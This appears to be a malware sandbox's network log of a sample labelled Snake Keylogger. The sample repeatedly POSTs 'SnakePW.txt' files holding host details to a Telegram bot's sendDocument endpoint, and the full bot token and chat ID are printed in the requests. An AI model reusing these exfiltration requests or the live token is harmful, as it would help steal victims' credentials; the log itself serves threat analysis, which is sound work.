                                                                    2022-06-26 07:33:42 UTC251OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 35 38 37 65 61 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fa587eadContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:42 UTC252INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:42 UTC252INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66913,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    15192.168.2.549783149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:32:44 UTC25OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756d7dd3d95
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:32:44 UTC25OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 37 64 64 33 64 39 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756d7dd3d95Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:32:44 UTC26INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:32:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:32:44 UTC26INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 36 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66761,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228764,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    150192.168.2.550005149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:42 UTC253OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fa972b02
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:42 UTC253OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 39 37 32 62 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fa972b02Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:43 UTC254INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:42 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:43 UTC254INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66914,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228822,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    151192.168.2.550006149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:43 UTC255OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fada5b0d
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:43 UTC255OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 61 64 61 35 62 30 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fada5b0dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:43 UTC255INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:43 UTC256INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66915,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228823,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    152192.168.2.550007149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:43 UTC256OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fb1757f1
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:43 UTC257OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 31 37 35 37 66 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fb1757f1Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:43 UTC257INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:43 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:43 UTC257INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66916,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228823,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    153192.168.2.550008149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:43 UTC258OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fb546dbc
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:43 UTC258OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 35 34 36 64 62 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fb546dbcContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:44 UTC259INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 509
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:44 UTC259INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66918,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228824,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    154192.168.2.550009149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:44 UTC260OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fb920edd
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
                                                                    2022-06-26 07:33:44 UTC260OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 62 39 32 30 65 64 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                                                                    Data Ascii: --------------------------8da5756fb920eddContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                                                                    2022-06-26 07:33:44 UTC260INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0
                                                                    Date: Sun, 26 Jun 2022 07:33:44 GMT
                                                                    Content-Type: application/json
                                                                    Content-Length: 507
                                                                    Connection: close
                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                    Access-Control-Allow-Origin: *
                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                    2022-06-26 07:33:44 UTC261INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 39 31 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 32 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                                                                    Data Ascii: {"ok":true,"result":{"message_id":66919,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228824,"document":{"file_


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    155192.168.2.550010149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    2022-06-26 07:33:45 UTC261OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                    Content-Type: multipart/form-data; boundary=------------------------8da5756fbfb8a63
                                                                    Host: api.telegram.org
                                                                    Content-Length: 504
